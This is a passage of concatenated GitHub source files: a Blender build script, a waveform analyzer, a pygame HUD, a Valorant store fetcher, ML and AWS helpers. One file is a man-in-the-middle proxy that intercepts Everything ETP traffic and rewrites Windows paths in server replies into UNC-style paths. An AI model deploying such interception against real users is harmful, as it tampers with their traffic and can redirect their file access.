env['WITH_BF_HDR']:\n defs.append('WITH_HDR')\n\ndefs.append('WITH_FRAMESERVER') # TODO, make optional\n\nif env['WITH_BF_FFMPEG']:\n defs.append('WITH_FFMPEG')\n incs += ' ' + env['BF_FFMPEG_INC']\n\nif env['WITH_BF_OGG']:\n defs.append('WITH_OGG')\n\nif env['WITH_BF_QUICKTIME']:\n defs.append('WITH_QUICKTIME')\n incs += ' ../../quicktime'\n\nif env['WITH_BF_GAMEENGINE']:\n defs.append('WITH_GAMEENGINE')\n \nif env['WITH_BF_FFTW3']:\n defs.append('WITH_FFTW3')\n\nif env['WITH_BF_SDL']:\n defs.append('WITH_SDL')\n\nif env['WITH_BF_OPENAL']:\n defs.append('WITH_OPENAL')\n\nif env['WITH_BF_JACK']:\n defs.append('WITH_JACK')\n\nif env['BF_UNIT_TEST']:\n defs.append('UNIT_TEST')\n\nif env['WITH_BF_PYTHON']:\n defs.append('WITH_PYTHON')\n\nif env['WITH_BF_COLLADA']:\n defs.append('WITH_COLLADA')\n\nif env['OURPLATFORM'] == 'linux':\n cflags='-pthread'\n incs += ' ../../../extern/binreloc/include'\n\nif env['OURPLATFORM'] in ('win32-vc', 'win32-mingw', 'linuxcross', 'win64-vc'):\n incs += ' ' + env['BF_PTHREADS_INC']\n\nif env['WITH_BF_INTERNATIONAL']:\n defs.append('WITH_INTERNATIONAL')\n\nmakesrna_tool.Append(CPPDEFINES=defs)\n\nmakesrna_tool.Append (CPPPATH = Split(incs))\n\nif env['OURPLATFORM'] == 'linuxcross':\n USE_WINE = True # when cross compiling on linux 64bit this is useful\nelse:\n USE_WINE = False\n\nif not USE_WINE:\n if env['OURPLATFORM'] == 'linuxcross':\n makesrna_tool.Replace(CC='gcc')\n makesrna_tool.Replace(AR='ar')\n makesrna_tool.Replace(LINK='gcc')\n\nif sys.platform != 'cygwin':\n makesrna_tool.Append (CCFLAGS = cflags)\nmakesrna_tool.Append (CPPDEFINES = defines)\n\nlibdir = root_build_dir+'/lib'\nif not (root_build_dir[0]==os.sep or root_build_dir[1]==':'):\n libdir = '#' + libdir\n\nmakesrna_tool.Append (LIBPATH = libdir)\n\nmakesrna_tool.Append( CFLAGS = env['CFLAGS'])\nmakesrna_tool.Append( CCFLAGS = env['CCFLAGS'])\nmakesrna_tool.Append( LINKFLAGS = env['PLATFORM_LINKFLAGS'])\n\nif env['BF_PROFILE']:\n makesrna_tool.Append (LINKFLAGS = env['BF_PROFILE_FLAGS'])\n\nif env['BF_DEBUG']:\n makesrna_tool.Append(CFLAGS = env['BF_DEBUG_CFLAGS'])\n makesrna_tool.Append(CCFLAGS = env['BF_DEBUG_CCFLAGS'])\n if env['OURPLATFORM'] in ('win32-vc','win64-vc'):\n makesrna_tool.Append(LINKFLAGS = ['/DEBUG','/PDB:makesrna.pdb'])\n\ntargetpath = root_build_dir+'/makesrna'\nif not (root_build_dir[0]==os.sep or root_build_dir[1]==':'):\n targetpath = '#' + targetpath\n\nif env['OURPLATFORM'] == 'linux' and root_build_dir[0]==os.sep:\n makesrna = 
makesrna_tool.Program (target = targetpath, source = source_files, LIBS=['bf_intern_guardedalloc', 'bf_dna', 'bf_blenlib'])\nelse:\n makesrna = makesrna_tool.Program (target = targetpath, source = source_files, LIBS=['bf_intern_guardedalloc', 'bf_dna', 'bf_blenlib'])\n\nrna_dict = rna.Dictionary()\nrna.Depends (generated_files, makesrna)\n\n# this seems bad, how to retrieve it from scons?\nbuild_dir = root_build_dir + os.sep +'source' + os.sep + 'blender' + os.sep + 'makesrna' + os.sep + 'intern' + os.sep\n \nif env['OURPLATFORM'] != 'linuxcross':\n if env['OURPLATFORM'] in ('win32-vc', 'win64-vc', 'win32-mingw'):\n rna.Command (generated_files, '', \"\\\"\" + root_build_dir+os.sep+\"makesrna.exe\\\" \\\"\" + build_dir )\n else:\n rna.Command (generated_files, '', \"\\\"\" + root_build_dir+os.sep+\"makesrna\\\" \\\"\" + build_dir + '\"' )\nelse:\n rna.Command (generated_files, '', root_build_dir+os.sep+\"makesrna.exe \" + build_dir)\n \n if USE_WINE:\n rna.Command (generated_files, '', 'wine ' + root_build_dir+os.sep+\"makesrna.exe \" + build_dir)\n else:\n rna.Command (generated_files, '', root_build_dir+os.sep+\"makesrna.exe \" + build_dir)\n\n\nobj = ['intern/rna_access.c']\nfor generated_file in generated_files:\n obj += ['intern/' + generated_file]\n\nReturn ('obj')\n\n","repo_name":"damiles/blendocv","sub_path":"source/blender/makesrna/intern/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":5136,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"52"} +{"seq_id":"13112855522","text":"from __future__ import print_function\nimport sys\nfrom threading import Thread, Event\nfrom socket import socket, timeout as SOCKET_TIMEOUT\nfrom select import select\nfrom Queue import Queue\nfrom config import TIMEOUT_CLIENT_CONNECTION, TIMEOUT_REQ_CONNECTION, \\\n EVERYTHING_SERVER_IP, ETP_PORT\nfrom utils import recvall, vprint\n\nSERVER2CLIENT_KEYNAME = \"server2client\"\nCLIENT2SERVER_KEYNAME = \"client2server\"\nSRC_KEY = 'SRC_STRING'\nREPL_KEY = 'REPL_STRING'\nreplace_data = {\n SERVER2CLIENT_KEYNAME: [\n (\"PATH C:\\\\Users\\\\\", \"PATH \\\\\\\\\"),\n ],\n CLIENT2SERVER_KEYNAME: [{SRC_KEY: \"\",\n REPL_KEY: \"\"}, ],\n}\n\n\ndef get_manip_data(dst_conn_keyname, data):\n assert dst_conn_keyname in replace_data, \\\n \"Invalid dst_conn_keyname. 
must be: \" + str(replace_data.keys())\n new_data = data\n for src_str, repl_str in replace_data[dst_conn_keyname]:\n new_data = new_data.replace(src_str, repl_str)\n return new_data\n\n\nclass HandleConnectionThread(Thread):\n def __init__(self, client_conn, client_addr, *args, **kargs):\n super(HandleConnectionThread, self).__init__(*args, **kargs)\n self._stop_event = Event()\n self.client_conn = client_conn\n self.client_addr = client_addr\n self.server_conn = socket()\n self.conns = [self.server_conn, self.client_conn]\n\n def stop(self):\n self.close_connection()\n self._stop_event.set()\n\n def stopped(self):\n return self._stop_event.is_set()\n\n def close_connection(self):\n print(\"[-] Closing Connection: \" + str(self.client_addr),\n file=sys.stderr)\n for conn in self.conns:\n conn.close()\n self.conns.remove(self.server_conn)\n self.conns.remove(self.client_conn)\n\n def get_manipulated_data(self, dst_sck, data):\n dst_conn_keyname = CLIENT2SERVER_KEYNAME \\\n if dst_sck is self.server_conn \\\n else SERVER2CLIENT_KEYNAME\n return get_manip_data(dst_conn_keyname, data)\n\n def run(self):\n self.server_conn.settimeout(TIMEOUT_REQ_CONNECTION)\n try:\n self.server_conn.connect((EVERYTHING_SERVER_IP, ETP_PORT))\n except SOCKET_TIMEOUT:\n print(\"[!] [SOCKET_TIMEOUT] No Connection with ETP-Server at \" +\n str((EVERYTHING_SERVER_IP, ETP_PORT)),\n file=sys.stderr)\n self.close_connection()\n return\n except Exception as e:\n print(\"[!] No Connection with ETP-Server at %s. Error: %s\" %\n (str((EVERYTHING_SERVER_IP, ETP_PORT)), str(e)),\n file=sys.stderr)\n self.close_connection()\n return\n\n message_queues = {\n self.server_conn: Queue(),\n self.client_conn: Queue()\n }\n while self.conns:\n readable, writable, exceptional = select(\n self.conns, self.conns, [], TIMEOUT_CLIENT_CONNECTION)\n if not (readable or writable or exceptional):\n self.stop()\n for sck in readable:\n dst_sck = self.client_conn \\\n if sck is self.server_conn \\\n else self.server_conn\n data = recvall(sck)\n if not data:\n self.stop()\n break\n # Manipulating the Data:\n new_data = self.get_manipulated_data(dst_sck, data)\n message_queues[dst_sck].put(new_data)\n for sck in writable:\n if not message_queues[sck].empty():\n next_msg = message_queues[sck].get_nowait()\n prefix = \"[server2client]\"\n if sck is self.server_conn:\n prefix = \"[client2server]\"\n vprint(prefix, next_msg)\n sck.send(next_msg)\n","repo_name":"NoamLoewenstern/EverythingMITMServer","sub_path":"handle_connection.py","file_name":"handle_connection.py","file_ext":"py","file_size_in_byte":3922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17743636721","text":"'''Ejercicio 2.3.3: Escribir un programa que pida al usuario un número entero positivo y muestre por pantalla la cuenta atrás desde ese número hasta cero separados por comas. Deberá solicitar el número hasta introducir uno correcto.'''\n# definicion de la funcion\ndef crear_lista(numero):\n lista=\"\"\n verificacion=int(numero)\n if verificacion > 0:\n for i in range(numero+1):\n lista += str(numero-i)\n if i < numero:\n lista += \", \"\n return lista\n raise ValueError (str(numero)+\": solo se permiten valores numericos mayores a 0. 
intentalo de nuevo: \")\n\nif __name__==\"__main__\":\n # entrada\n numero = 'error'\n while numero == 'error':\n try:\n numero = int(input(\"introduce un numero que no sea negativo: \"))\n # procesamiento\n lista=crear_lista(numero)\n # salida\n print(lista)\n except ValueError:\n print(str(numero)+\": solo se permiten valores numericos mayores a 0. intentalo de nuevo: \")\n","repo_name":"IES-Rafael-Alberti/2223-u2-excepciones-ricitos2001","sub_path":"src/actividad3.py","file_name":"actividad3.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16631867697","text":"import sys\nfrom waveform_class import *\n\n# print usage\nif len(sys.argv) != 6 and len(sys.argv) != 7:\n print(\"\\nUSAGE: python waveform_analyzer.py time_trend_file_path waveform_file_path waveform_n_points config_file_path output_name n_events\")\n print(\"\\nARGUMENTS:\")\n print(\"time_trend_file_path:\\t\\t path to .csv file with time trend\")\n print(\"waveform_file_path:\\t\\t path to .csv file with waveform\")\n print(\"waveform_n_points:\\t\\t number of points in a waveform (e.g. 6250)\")\n print(\"config_file_path:\\t\\t path to configuration file (e.g. config.txt)\")\n print(\"output_name:\\t\\t\\t name used to generate output files (e.g. SiPM00029)\")\n print(\"n_events (optional):\\t\\t number of events to analyze, or text file with event list (if missing, analyze the whole file)\\n\")\n sys.exit()\nprint(\"\\n---------- WAVEFORM ANALYZER LAUNCHED ----------\\n\")\n\n#creates an object waveform of the waveform class\n#_waveform_ = Waveform(sys.argv[1],sys.argv[2],sys.argv[5] if len(sys.argv)==6 else 6250)\n_waveform_ = Waveform(sys.argv[1],sys.argv[2],(int)(sys.argv[3]))\n\n#creates a dictionary of command options to be passed to the class methods\ndef wf_dict():\n config_file = open(sys.argv[4])\n\n lines = config_file.readlines()\n mydict = {}\n for line in lines:\n if line[0] == \"-\": continue\n var,val = line.split('=')\n mydict[var] = val.strip()\n if mydict[var]==\"True\" or mydict[var]==\"true\" or mydict[var]==1: mydict[var] = True\n elif mydict[var]==\"False\" or mydict[var]==\"false\" or mydict[var]==0: mydict[var] = False\n\n if mydict[var]==\"first_points\": mydict[var] = 0\n if mydict[var]==\"max_range\": mydict[var] = 1\n\n if mydict[var]==\"previous_points\": mydict[var] = 0\n if mydict[var]==\"baseline_gap\": mydict[var] = 1\n\n return mydict\n\n#creates on object dictionary\n_wf_dict_ = wf_dict()\n\n\n# ---- Baseline ----\n# baseline_method = \"first_point\"\n# baseline_n_points = 100\n# ---- Minima ----\n# minimum_search_range=50 OK\n# minimum_back_shift=100\n# minimum_n_points=100\n# minimum_gap=0.03\n\n\n#runs the algorithm\n#n_ev = int(sys.argv[6]) if (len(sys.argv)==7 and int(sys.argv[6])>0) else 1000000\nevent_list = []\nif len(sys.argv) == 7:\n try:\n val = int(sys.argv[6])\n print(\"You gave a numer of events as input, analyzing events from 0 to\", val)\n event_list = [int(i) for i in range(val)]\n except ValueError:\n try:\n val = str(sys.argv[6])\n text_file = open(val, \"r\")\n lines = text_file.read().split('\\n')\n text_file.close()\n event_list = [int(i) for i in lines[:-1]]\n print(\"You gave file with a list of events as input, analyzing\",len(event_list),\"events:\", event_list)\n except:\n print(\"Please give a number of events or a path to file with event list, stopping\")\n sys.exit()\nelse: print(\"No number of events specified, analyzing all 
events\")\n\n_waveform_.find_all_minima(event_list,_wf_dict_[\"baseline_method\"],(int)(_wf_dict_[\"baseline_n_points\"]),(int)(_wf_dict_[\"minimum_method\"]),(int)(_wf_dict_[\"minimum_search_range\"]),(int)(_wf_dict_[\"minimum_back_shift\"]),(int)(_wf_dict_[\"minimum_n_points\"]),(float)(_wf_dict_[\"minimum_gap\"]),(int)(_wf_dict_[\"minimum_n_close\"]),_wf_dict_[\"show_plot\"],_wf_dict_[\"save_plot\"],sys.argv[5])\n\n_waveform_.save_minimum_table(sys.argv[5])\n","repo_name":"AlexRed806/SiPM","sub_path":"waveform_analyzer.py","file_name":"waveform_analyzer.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27172406737","text":"import pygame.font\nfrom settings import *\n\n\nclass GUI:\n def __init__(self, screen):\n self.screen = screen\n self.screen_rect = self.screen.get_rect()\n\n self.text_color = WHITE\n self.text_background_color = LIGHTBLUE\n self.font = pygame.font.Font(\"resources/fonts/emulogic.ttf\", 20)\n\n self.name = \"MARIO\"\n self.name_image = None\n self.name_rect = None\n\n self.score = 0\n self.score_image = None\n self.score_rect = None\n\n self.coin_counter = 0\n self.coin_counter_image = None\n self.coin_counter_rect = None\n\n self.coin_image = pygame.image.load('resources/Images/coin.gif')\n self.coin_rect = self.coin_image.get_rect()\n\n self.world_text = \"WORLD\"\n self.world_text_image = None\n self.world_text_rect = None\n\n self.world_number = 1\n self.level_number = 1\n self.level_name_image = None\n self.level_name_rect = None\n\n self.timer_name = \"TIMER\"\n self.timer_name_image = None\n self.timer_name_rect = None\n\n self.timer = 400\n self.timer_image = None\n self.timer_rect = None\n\n self.update_name_text()\n self.update_score_text()\n self.update_coin_counter_text()\n self.update_coin_image()\n self.update_world_text()\n self.update_level_name_text()\n self.update_timer_name_text()\n self.update_timer_text()\n\n def update_name_text(self):\n self.name_image = self.font.render(self.name, True, self.text_color, self.text_background_color)\n self.name_rect = self.name_image.get_rect()\n self.name_rect.left = self.name_rect.left + 35\n self.name_rect.top = 20\n\n def update_score_text(self):\n score_str = \"{:,}\".format(self.score).zfill(6)\n self.score_image = self.font.render(score_str, True, self.text_color, self.text_background_color)\n self.score_rect = self.score_image.get_rect()\n self.score_rect.left = self.name_rect.left\n self.score_rect.top = 50\n\n def update_coin_counter_text(self):\n coin_counter_str = \"{:,}\".format(self.coin_counter).zfill(2)\n self.coin_counter_image = self.font.render(coin_counter_str, True, self.text_color, self.text_background_color)\n self.coin_counter_rect = self.coin_counter_image.get_rect()\n self.coin_counter_rect.left = self.screen_rect.right * 0.36\n self.coin_counter_rect.top = 50\n\n def update_coin_image(self):\n self.coin_rect.right = self.coin_counter_rect.left - 10\n self.coin_rect.top = 50\n\n def update_world_text(self):\n self.world_text_image = self.font.render(self.world_text, True, self.text_color, self.text_background_color)\n self.world_text_rect = self.world_text_image.get_rect()\n self.world_text_rect.left = self.screen_rect.right * 0.58\n self.world_text_rect.top = 20\n\n def update_level_name_text(self):\n level_name_str = str(self.world_number) + \"-\" + str(self.level_number)\n self.level_name_image = self.font.render(level_name_str, True, self.text_color, 
self.text_background_color)\n self.level_name_rect = self.level_name_image.get_rect()\n self.level_name_rect.centerx = self.world_text_rect.centerx\n self.level_name_rect.top = 50\n\n def update_timer_name_text(self):\n self.timer_name_image = self.font.render(self.timer_name, True, self.text_color, self.text_background_color)\n self.timer_name_rect = self.timer_name_image.get_rect()\n self.timer_name_rect.right = self.screen_rect.right - 35\n self.timer_name_rect.top = 20\n\n def update_timer_text(self):\n timer_str = \"{:,}\".format(self.timer).zfill(3)\n self.timer_image = self.font.render(timer_str, True, self.text_color, self.text_background_color)\n self.timer_rect = self.timer_image.get_rect()\n self.timer_rect.right = self.timer_name_rect.right\n self.timer_rect.top = 50\n\n def show_score(self):\n self.screen.blit(self.name_image, self.name_rect)\n self.screen.blit(self.score_image, self.score_rect)\n self.screen.blit(self.coin_counter_image, self.coin_counter_rect)\n self.screen.blit(self.coin_image, self.coin_rect)\n self.screen.blit(self.world_text_image, self.world_text_rect)\n self.screen.blit(self.level_name_image, self.level_name_rect)\n self.screen.blit(self.timer_name_image, self.timer_name_rect)\n self.screen.blit(self.timer_image, self.timer_rect)\n","repo_name":"mtizhoush/supermario","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":4530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16761259564","text":"from functools import lru_cache\nmatrix =[\n [0,1,1,1],\n [1,1,1,1],\n [0,1,1,1]\n]\nm=len(matrix)\nn=len(matrix[0])\n\ndef dp(i,j):\n if i>=m or j>=n:\n return 0\n if matrix[i][j]==0:\n return 0\n else:\n return min(dp(i+1,j),dp(i,j+1),dp(i+1,j+1))+1\n\n#list1=[dp(i,j) for i in range(m) for j in range(n)]\nprint(dp(0,1))","repo_name":"jagdishwar/CP","sub_path":"Atcoder_DP/Count Square Submatrices with All Ones.py","file_name":"Count Square Submatrices with All Ones.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70750636005","text":"from riot_auth import RiotAuth\nimport asyncio\nimport riot_auth\nimport requests\nimport json\nimport urllib\n\nUSERINFO_URL = f'https://auth.riotgames.com/userinfo'\n\n# set riot client version\ndef set_riot_client_version():\n with urllib.request.urlopen(\"https://valorant-api.com/v1/version\") as url:\n riot_client_build = json.load(url)['data']['riotClientBuild']\n RiotAuth.RIOT_CLIENT_USER_AGENT = f'{riot_client_build} %s (Windows;10;;Professional, x64)'\n\n# translate item uuid to name and icons\ndef get_weapon_info(uuid):\n with open('./db/weapons_kr.json', encoding='utf-8') as f:\n weapons = json.load(f)\n result = None\n for weapon in weapons:\n for single_skin in weapon['skins']:\n # max level video\n video_url = single_skin['levels'][-1]['streamedVideo']\n item = single_skin['levels'][0]\n if item['uuid'] == uuid:\n result = item\n result['streamedVideo'] = video_url\n del result['levelItem']\n del result['assetPath']\n return result\n\nclass UserInfo(riot_auth.RiotAuth):\n def __init__(self, **kwargs):\n super().__init__()\n self.entries = ['access_token', 'scope', 'id_token', 'token_type', 'expires_at', 'user_id', 'entitlements_token']\n @property\n def nickname(self):\n header = {\n 'Authorization': f'Bearer {self.access_token}'\n }\n res_userinfo = requests.get(USERINFO_URL, headers=header)\n profile = res_userinfo.json()\n 
nickname = profile['acct']['game_name'] + '#' + profile['acct']['tag_line']\n return nickname\n \n def export_data(self):\n data = dict()\n data['_cookies'] = self._cookie_jar._cookies\n for entry in self.entries:\n data[entry] = getattr(self,entry)\n return data\n \n def import_data(self, data:dict):\n self._cookie_jar._cookies = data['_cookies']\n for entry in self.entries:\n setattr(self, entry, data[entry])\n return\n \nclass ValStoreFetcher():\n def __init__(self, region='kr'):\n self.region = region\n\n async def fetch_store(self, auths:dict[str, UserInfo]):\n storefronts = dict()\n for user_id, auth in auths.items():\n store_url = f'https://pd.{self.region}.a.pvp.net/store/v2/storefront/{auth.user_id}'\n header = {\n 'X-Riot-Entitlements-JWT': f'{auth.entitlements_token}',\n 'Authorization': f'Bearer {auth.access_token}'\n }\n res_store = requests.get(store_url, headers=header)\n nickname = auth.nickname\n storefronts[nickname] = res_store.json()\n return storefronts\n \nif __name__ == '__main__':\n async def main():\n user_info_dict = dict()\n vf = ValStoreFetcher()\n cred = ('u', 'p')\n user_info = UserInfo()\n await user_info.authorize(*cred)\n user_info_dict[user_info.user_id] = user_info\n res = await vf.fetch_store(user_info_dict)\n res = res[f'{user_info.nickname}'][\"SkinsPanelLayout\"][\"SingleItemOffers\"]\n for uuid in res:\n print(get_weapon_info(uuid))\n asyncio.run(main())\n\n \n\n \n\n \n \n\n \n","repo_name":"L1nked2/ValorantDiscordBot","sub_path":"src/valstore.py","file_name":"valstore.py","file_ext":"py","file_size_in_byte":3114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26073609074","text":"import tensorflow.experimental.numpy as np\n\nfrom functools import partial\n\n\ndef var(shape=(10, 64, 64, 3), mode=\"uniform\", min=0, max=1, dtype=None):\n if mode == \"normal\" or mode == \"n\":\n return np.random.normal(min, max, shape)\n elif mode == \"zero\" or mode == 0:\n return np.zeros(shape)\n elif mode == \"one\" or mode == 1:\n return np.ones(shape)\n elif mode == \"int\" or isinstance(mode, int):\n return np.random.randint(min, max, shape, dtype=dtype if dtype else \"int32\")\n return np.random.uniform(min, max, shape)\n\n\ndef image(shape=(10, 224, 224, 3), pre=False, mode=None, min=None, max=None):\n if isinstance(shape, int):\n shape = (10, shape, shape, 1)\n if pre:\n mode = mode or \"int\"\n min = min or 0\n max = max or 256\n else:\n mode = mode or \"uniform\"\n min = min or 0\n max = max or 1\n return var(\n shape=shape,\n mode=mode,\n min=min,\n max=max\n )\n\n\n# init_raw = partial(init_image, mode=\"int\")\nvec = partial(var, shape=(32, 64))\nlabel = partial(var, max=10, mode=\"int\", shape=(32, 64))\n","repo_name":"jakubkwiatkowski/core_tools","sub_path":"core_tools/ops/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14993256981","text":"from pl_bolts.datamodules import CIFAR10DataModule\nfrom pl_bolts.models.autoencoders import VAE\nfrom pytorch_lightning import Trainer\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nfrom torch import nn\nfrom torch.utils.data import DataLoader, Dataset\nimport random\nfrom torchvision.models import resnet18 \nimport torchvision.transforms as T\nfrom PIL import Image\nfrom custom_VAE import custom_VAE\n\nclass CustomDataset(Dataset):\n def __init__(self, batch_rgb_static_last_obs, 
batch_rgb_static_first_obs, batch_rgb_static_tensor, actions):\n self.batch_rgb_static_last_obs = batch_rgb_static_last_obs\n self.batch_rgb_static_first_obs = batch_rgb_static_first_obs\n self.batch_rgb_static_tensor = batch_rgb_static_tensor\n self.actions = actions\n \n def __len__(self):\n return self.batch_rgb_static_last_obs.shape[0]\n \n def __getitem__(self, index):\n return self.batch_rgb_static_last_obs[index], self.batch_rgb_static_first_obs[index], self.batch_rgb_static_tensor[index], self.actions[index] \n\n#Loading GTI demonstrations\ndef read_data(path):\n indices = [141,3716] #filtered gti_demos\n indices = list(range(indices[0], indices[1] + 1))\n data = ['rgb_static', 'rgb_gripper']\n\n idx = indices[0]\n i = 0\n len_indices = indices[-1] - indices[0]\n rgb_static = [0] * (len_indices+1)\n rgb_gripper = [0] * (len_indices+1)\n actions = [0] * (len_indices+1)\n for idx in indices:\n t = np.load(f'{path}/episode_{idx:07d}.npz', allow_pickle=True)\n print(f\"episode_{indices[i]:07d}.npz\")\n for d in data:\n if d == 'rgb_static':\n rgb_static[i] = t[d][:,:,::-1] # Converts from BGR to RGB\n elif d == 'rgb_gripper':\n rgb_gripper[i] = t[d][:,:,::-1] # Converts from BGR to RGB\n\n actions[i] = t['actions']\n i+=1\n \n return np.array(rgb_static), np.array(rgb_gripper), np.array(actions)\n\ndef random_sampler(rgb_static, rgb_gripper, actions, batch_size, H):\n \n # H is the sample length\n indices = list(range(len(rgb_static) - H))\n\n random_indices = random.choices(indices, k = len(rgb_static) * 3) # Create a list of random indices with length of rgb_static * 3 = 3576 * 3\n\n batch_rgb_static_tensor = torch.zeros((len(rgb_static) * 3, H, 3, rgb_static.shape[2], rgb_static.shape[3]), dtype=torch.uint8)\n #batch_rgb_gripper_tensor = torch.zeros((batch_size, H, 3, rgb_gripper.shape[2], rgb_gripper.shape[3]), dtype=torch.uint8)\n batch_actions_tensor = torch.zeros((len(rgb_static) * 3, H, actions.shape[1]))\n \n i = 0\n for index in random_indices:\n batch_rgb_static_tensor[i] = rgb_static[index:index + H]\n batch_actions_tensor[i] = torch.from_numpy(actions[index:index + H])\n i+=1\n\n return batch_rgb_static_tensor, batch_actions_tensor \n\ndef resize(rgb_static):\n \"\"\" \n Resizes rgb_static images from (200,200) to (32,32)\n \"\"\"\n batch_rgb_static_tensor_resized = torch.zeros((len(rgb_static), 3, 32, 32), dtype=torch.uint8)\n \n transform = T.Compose([\n T.Resize(size = (32, 32)),\n T.PILToTensor()\n ])\n\n\n for i in range(len(rgb_static)):\n\n img = Image.fromarray(rgb_static[i][:,:,::-1])\n\n batch_rgb_static_tensor_resized[i] = transform(img)\n\n return batch_rgb_static_tensor_resized\n\n\ndef VariationalAutoEncoder(rgb_static, rgb_gripper, actions):\n\n vae = custom_VAE(32, enc_type= \"resnet18\")\n #vae = custom_VAE.load_from_checkpoint('/home/ibrahimm/Documents/dl_lab/calvin/sg_weights/epoch=5563-step=1869503.ckpt') #sg_weights\n vae = custom_VAE.load_from_checkpoint('/home/ibrahimm/Documents/dl_lab/calvin/sg_st_step_actions_weights/epoch=10368-step=394022.ckpt') #sg_st_weights\n\n\n H = 15\n batch_size = 32\n\n batch_rgb_static_tensor, batch_actions_tensor = random_sampler(rgb_static, rgb_gripper, actions, batch_size, H)\n\n batch_rgb_static_first_obs = batch_rgb_static_tensor[:,0].float()\n batch_rgb_static_last_obs = batch_rgb_static_tensor[:,-1].float()\n\n #print(batch_rgb_static_last_obs, batch_rgb_static_first_obs)\n\n dataset = CustomDataset(batch_rgb_static_last_obs, batch_rgb_static_first_obs, batch_rgb_static_tensor, batch_actions_tensor)\n\n 
train_dataloader = DataLoader(dataset, batch_size = 1, num_workers = 2)\n\n #for step, (sg, st, _ , actions) in enumerate(train_dataloader):\n #print(\"in loop\")\n\n sg, st, _ , actions = next(iter(train_dataloader))\n\n vae.eval()\n #sg_reconstructed = vae(sg) # for sg_weights\n sg_reconstructed, zg = vae(sg, st) # for sg_st_weights\n\n return sg, sg_reconstructed, zg\n\n\nif __name__ == \"__main__\":\n path = './gti_demos/'\n rgb_static, rgb_gripper, actions = read_data(path)\n \n batch_rgb_static_tensor_resized = resize(rgb_static)\n\n\n sg, sg_reconstructed, zg = VariationalAutoEncoder(batch_rgb_static_tensor_resized, rgb_gripper, actions)\n\n fig, axes = plt.subplots(2, 10, figsize=(10, 2))\n axes[0][0].set_ylabel('Real', fontsize=12)\n axes[1][0].set_ylabel('Generated', fontsize=12)\n\n for i in range(10):\n \n ax_real = axes[0][i]\n ax_real.imshow((sg[i].type(torch.uint8)).permute(1,2,0))\n ax_real.get_xaxis().set_visible(False)\n ax_real.get_yaxis().set_visible(False)\n\n ax_gen = axes[1][i]\n ax_gen.imshow((sg_reconstructed[i].type(torch.uint8)).permute(1,2,0))\n ax_gen.get_xaxis().set_visible(False)\n ax_gen.get_yaxis().set_visible(False)\n\n plt.show()","repo_name":"youssefnassar95/dl_lab_project","sub_path":"VAE_reconstruction_test.py","file_name":"VAE_reconstruction_test.py","file_ext":"py","file_size_in_byte":5515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7111465434","text":"import logging, pyperclip\nfrom common.config import Configuration\nfrom common.ec2.vpc import Vpc, Vpcs\nfrom common.ec2.instance import Instance\nfrom common.ec2.subnet import Subnet\nfrom common.ec2.security_group import SecurityGroup\nfrom common.ec2.internet_gateway import InternetGateways\nfrom common.ec2.key_pair import KeyPairs\n\nclass CreateAWSResources():\n def _getVpc() -> Vpc:\n vpc = Vpcs.getVpc(name=f\"{Configuration.project_name} vpc\", cidr_block='10.0.0.0/16')\n vpc.wait_until_exists()\n vpc.wait_until_available()\n vpc.enableDnsSupport = True\n vpc.enableDnsHostnames = True\n return vpc\n\n def _getSubnet(vpc: Vpc) -> Subnet:\n subnet = vpc.getSubnet(\n name = f\"{Configuration.project_name} subnet\", \n cidr_block = \"10.0.1.0/24\", \n availability_zone = Configuration.region_name + \"a\")\n subnet.wait_until_available()\n subnet.map_public_ip_on_launch = True\n return subnet\n\n def _getSecurityGroup(vpc: Vpc) -> SecurityGroup:\n sg = vpc.getSecurityGroup(name=f\"{Configuration.project_name} security group\")\n for port in set(Configuration.args.ports):\n ingress_description = f\"Open port {port}\"\n ingress_name = ingress_description.lower().replace(\" \", \"-\")\n sg.authorizeIngress(\n from_port = port, \n protocol = 'tcp', \n cidr_block = '0.0.0.0/0', \n name = ingress_name, \n description = ingress_description, \n to_port = port\n )\n sg.wait_until_exists()\n return sg\n\n def _getInstance(vpc: Vpc, subnet: Subnet, sg: SecurityGroup) -> Instance:\n keypair = KeyPairs.getKeyPair(name=Configuration.project_name.lower().replace(' ', '-'))\n keypair.wait_until_exists()\n bootstrap_string = None\n if Configuration.args.aws_access_key_id and Configuration.args.aws_secret_access_key and Configuration.args.bootstrap_script:\n with open(Configuration.args.bootstrap_script) as f:\n bootstrap_string = f.read().format(Configuration.args.aws_access_key_id, Configuration.args.aws_secret_access_key)\n\n instance = vpc.runInstance(\n name = f\"{Configuration.project_name} instance\", \n keypair = keypair, \n subnet = subnet, 
